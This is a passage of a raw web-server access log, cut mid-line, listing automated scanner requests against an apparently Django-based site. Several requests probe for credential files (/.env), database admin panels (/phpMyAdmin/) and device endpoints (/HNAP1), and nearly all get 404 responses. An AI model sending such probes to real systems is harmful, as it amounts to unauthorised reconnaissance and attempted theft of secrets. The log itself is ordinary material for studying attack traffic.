headers in 158 bytes (1 switches on core 0) +[pid: 
19147|app: 0|req: 21/233] 47.252.35.224 () {32 vars in 409 bytes} [Tue Feb 1 22:25:40 2022] GET /text4041643754338 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 203/234] 47.252.35.224 () {32 vars in 395 bytes} [Tue Feb 1 22:25:41 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 204/235] 47.252.35.224 () {32 vars in 385 bytes} [Tue Feb 1 22:25:41 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 205/236] 47.252.35.224 () {36 vars in 463 bytes} [Tue Feb 1 22:25:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 206/237] 47.252.35.224 () {34 vars in 414 bytes} [Tue Feb 1 22:25:56 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 207/238] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 1 22:49:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 208/239] 128.14.209.250 () {30 vars in 442 bytes} [Tue Feb 1 23:27:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 22/240] 106.14.220.97 () {34 vars in 603 bytes} [Wed Feb 2 00:20:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 209/241] 106.14.220.97 () {34 vars in 648 bytes} [Wed Feb 2 00:20:22 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 210/242] 106.14.220.97 () {34 vars in 614 bytes} [Wed Feb 2 00:20:22 2022] GET /admin/ => generated 0 bytes 
in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 211/243] 106.14.220.97 () {34 vars in 651 bytes} [Wed Feb 2 00:20:22 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 212/244] 106.14.220.97 () {36 vars in 712 bytes} [Wed Feb 2 00:20:22 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 213/245] 106.14.220.97 () {36 vars in 714 bytes} [Wed Feb 2 00:20:22 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 214/246] 106.14.220.97 () {36 vars in 744 bytes} [Wed Feb 2 00:20:22 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 215/247] 106.14.220.97 () {36 vars in 724 bytes} [Wed Feb 2 00:20:23 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 216/248] 106.14.220.97 () {36 vars in 742 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 217/249] 106.14.220.97 () {36 vars in 782 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 218/250] 106.14.220.97 () {36 vars in 752 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 219/251] 106.14.220.97 () {36 vars in 748 bytes} [Wed Feb 2 00:20:23 2022] GET 
/static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 220/252] 106.14.220.97 () {36 vars in 760 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 221/253] 106.14.220.97 () {36 vars in 780 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 222/254] 106.14.220.97 () {36 vars in 744 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 9/255] 106.14.220.97 () {36 vars in 748 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 10/256] 106.14.220.97 () {36 vars in 714 bytes} [Wed Feb 2 00:20:23 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 11/257] 106.14.220.97 () {36 vars in 714 bytes} [Wed Feb 2 00:20:23 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 23/258] 106.14.220.97 () {36 vars in 700 bytes} [Wed Feb 2 00:20:23 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 223/259] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 00:37:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 224/260] 170.130.187.6 () {30 vars in 372 bytes} [Wed Feb 2 00:44:56 2022] GET / => 
generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 225/261] 79.172.90.55 () {32 vars in 469 bytes} [Wed Feb 2 00:48:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 226/262] 71.6.232.4 () {34 vars in 484 bytes} [Wed Feb 2 01:06:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 227/263] 183.136.225.56 () {34 vars in 535 bytes} [Wed Feb 2 01:24:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 228/264] 109.237.103.9 () {36 vars in 523 bytes} [Wed Feb 2 01:40:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 229/265] 132.145.39.16 () {36 vars in 432 bytes} [Wed Feb 2 01:45:29 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 230/266] 128.14.134.170 () {34 vars in 488 bytes} [Wed Feb 2 02:20:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 231/267] 101.132.64.234 () {38 vars in 646 bytes} [Wed Feb 2 02:56:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 232/268] 101.132.64.234 () {38 vars in 692 bytes} [Wed Feb 2 02:56:42 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 233/269] 101.132.64.234 () {38 vars in 658 bytes} [Wed Feb 2 02:56:42 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 234/270] 101.132.64.234 () {38 vars 
in 695 bytes} [Wed Feb 2 02:56:42 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 235/271] 101.132.64.234 () {40 vars in 755 bytes} [Wed Feb 2 02:56:42 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 236/272] 101.132.64.234 () {40 vars in 757 bytes} [Wed Feb 2 02:56:42 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 237/273] 101.132.64.234 () {40 vars in 787 bytes} [Wed Feb 2 02:56:42 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 238/274] 101.132.64.234 () {40 vars in 767 bytes} [Wed Feb 2 02:56:42 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 239/275] 101.132.64.234 () {40 vars in 757 bytes} [Wed Feb 2 02:56:42 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 240/276] 101.132.64.234 () {40 vars in 757 bytes} [Wed Feb 2 02:56:42 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 241/277] 101.132.64.234 () {40 vars in 743 bytes} [Wed Feb 2 02:56:43 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 242/278] 45.248.42.81 () {32 vars in 463 bytes} [Wed Feb 2 03:08:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 243/279] 106.15.197.115 () {38 vars in 646 bytes} [Wed Feb 2 03:12:40 2022] GET / => generated 179 bytes 
in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 244/280] 106.15.197.115 () {38 vars in 692 bytes} [Wed Feb 2 03:12:40 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 245/281] 106.15.197.115 () {38 vars in 658 bytes} [Wed Feb 2 03:12:40 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 246/282] 106.15.197.115 () {38 vars in 695 bytes} [Wed Feb 2 03:12:40 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 247/283] 106.15.197.115 () {40 vars in 755 bytes} [Wed Feb 2 03:12:40 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 248/284] 106.15.197.115 () {40 vars in 757 bytes} [Wed Feb 2 03:12:40 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 249/285] 106.15.197.115 () {40 vars in 787 bytes} [Wed Feb 2 03:12:40 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 250/286] 106.15.197.115 () {40 vars in 767 bytes} [Wed Feb 2 03:12:41 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 251/287] 106.15.197.115 () {40 vars in 757 bytes} [Wed Feb 2 03:12:41 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 252/288] 106.15.197.115 () {40 vars in 757 bytes} [Wed Feb 2 03:12:41 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 253/289] 106.15.197.115 () {40 vars in 743 bytes} [Wed Feb 2 03:12:41 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 254/290] 139.196.127.159 () {34 vars in 605 bytes} [Wed Feb 2 03:58:46 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 255/291] 139.196.127.159 () {34 vars in 651 bytes} [Wed Feb 2 03:58:46 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 256/292] 139.196.127.159 () {34 vars in 617 bytes} [Wed Feb 2 03:58:46 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 257/293] 139.196.127.159 () {34 vars in 654 bytes} [Wed Feb 2 03:58:46 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 258/294] 139.196.127.159 () {36 vars in 714 bytes} [Wed Feb 2 03:58:46 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 259/295] 139.196.127.159 () {36 vars in 716 bytes} [Wed Feb 2 03:58:46 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 260/296] 139.196.127.159 () {36 vars in 746 bytes} [Wed Feb 2 03:58:46 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 261/297] 139.196.127.159 () {36 vars in 726 bytes} [Wed Feb 2 03:58:46 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
262/298] 139.196.127.159 () {36 vars in 744 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 263/299] 139.196.127.159 () {36 vars in 784 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 264/300] 139.196.127.159 () {36 vars in 754 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 265/301] 139.196.127.159 () {36 vars in 750 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 266/302] 139.196.127.159 () {36 vars in 762 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 267/303] 139.196.127.159 () {36 vars in 782 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 24/304] 139.196.127.159 () {36 vars in 746 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 25/305] 139.196.127.159 () {36 vars in 750 bytes} [Wed Feb 2 03:58:46 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 26/306] 139.196.127.159 () {36 vars in 716 bytes} [Wed Feb 2 03:58:46 2022] GET /phpMyAdmin/ => generated 179 bytes 
in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 27/307] 139.196.127.159 () {36 vars in 716 bytes} [Wed Feb 2 03:58:46 2022] GET /phpmyadmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 28/308] 139.196.127.159 () {36 vars in 702 bytes} [Wed Feb 2 03:58:46 2022] GET /wcm/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 268/309] 83.97.20.34 () {30 vars in 328 bytes} [Wed Feb 2 04:12:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 269/310] 106.14.116.241 () {34 vars in 604 bytes} [Wed Feb 2 04:28:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 29/311] 106.14.116.241 () {34 vars in 650 bytes} [Wed Feb 2 04:28:56 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 30/312] 106.14.116.241 () {34 vars in 616 bytes} [Wed Feb 2 04:28:56 2022] GET /admin/ => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 31/313] 106.14.116.241 () {34 vars in 653 bytes} [Wed Feb 2 04:28:56 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 270/314] 106.14.116.241 () {36 vars in 711 bytes} [Wed Feb 2 04:28:56 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 271/315] 106.14.116.241 () {36 vars in 714 bytes} [Wed Feb 2 04:28:56 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
272/316] 106.14.116.241 () {36 vars in 744 bytes} [Wed Feb 2 04:28:56 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 273/317] 106.14.116.241 () {36 vars in 724 bytes} [Wed Feb 2 04:28:56 2022] GET /images/ofbiz.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 274/318] 106.14.116.241 () {36 vars in 742 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 275/319] 106.14.116.241 () {36 vars in 782 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 276/320] 106.14.116.241 () {36 vars in 752 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 1/321] 106.14.116.241 () {36 vars in 748 bytes} [Wed Feb 2 04:28:56 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 237 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 277/322] 106.14.116.241 () {36 vars in 760 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 278/323] 106.14.116.241 () {36 vars in 780 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 279/324] 106.14.116.241 () {36 vars in 744 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 
msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 280/325] 106.14.116.241 () {36 vars in 749 bytes} [Wed Feb 2 04:28:57 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 281/326] 106.14.116.241 () {36 vars in 715 bytes} [Wed Feb 2 04:28:57 2022] GET /phpMyAdmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 282/327] 106.14.116.241 () {36 vars in 715 bytes} [Wed Feb 2 04:28:57 2022] GET /phpmyadmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 12/328] 106.14.116.241 () {36 vars in 701 bytes} [Wed Feb 2 04:28:57 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 283/329] 109.237.103.123 () {36 vars in 525 bytes} [Wed Feb 2 05:43:07 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 284/330] 136.144.41.117 () {40 vars in 568 bytes} [Wed Feb 2 06:10:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 285/331] 74.82.47.2 () {28 vars in 304 bytes} [Wed Feb 2 06:18:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 286/332] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 06:54:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 287/333] 36.79.240.95 () {32 vars in 463 bytes} [Wed Feb 2 06:54:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 288/334] 62.171.132.199 () {40 vars in 
672 bytes} [Wed Feb 2 07:30:37 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 289/335] 66.240.236.116 () {34 vars in 394 bytes} [Wed Feb 2 07:32:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 290/336] 23.90.160.114 () {34 vars in 487 bytes} [Wed Feb 2 08:44:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 291/337] 23.90.160.114 () {34 vars in 507 bytes} [Wed Feb 2 08:44:02 2022] GET /analytics/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 292/338] 103.203.57.7 () {32 vars in 398 bytes} [Wed Feb 2 08:51:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 293/339] 192.241.208.210 () {34 vars in 395 bytes} [Wed Feb 2 09:00:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 294/340] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 2 10:33:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 295/341] 106.14.121.178 () {34 vars in 604 bytes} [Wed Feb 2 11:01:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 13/342] 106.14.121.178 () {34 vars in 650 bytes} [Wed Feb 2 11:01:03 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 296/343] 106.14.121.178 () {34 vars in 616 bytes} [Wed Feb 2 11:01:03 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on 
core 0) +[pid: 19148|app: 0|req: 297/344] 106.14.121.178 () {34 vars in 653 bytes} [Wed Feb 2 11:01:03 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 298/345] 106.14.121.178 () {36 vars in 713 bytes} [Wed Feb 2 11:01:03 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 299/346] 106.14.121.178 () {36 vars in 715 bytes} [Wed Feb 2 11:01:03 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 300/347] 106.14.121.178 () {36 vars in 745 bytes} [Wed Feb 2 11:01:03 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 301/348] 106.14.121.178 () {36 vars in 725 bytes} [Wed Feb 2 11:01:03 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 302/349] 106.14.121.178 () {36 vars in 743 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 303/350] 106.14.121.178 () {36 vars in 783 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 304/351] 106.14.121.178 () {36 vars in 753 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 305/352] 106.14.121.178 () {36 vars in 749 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
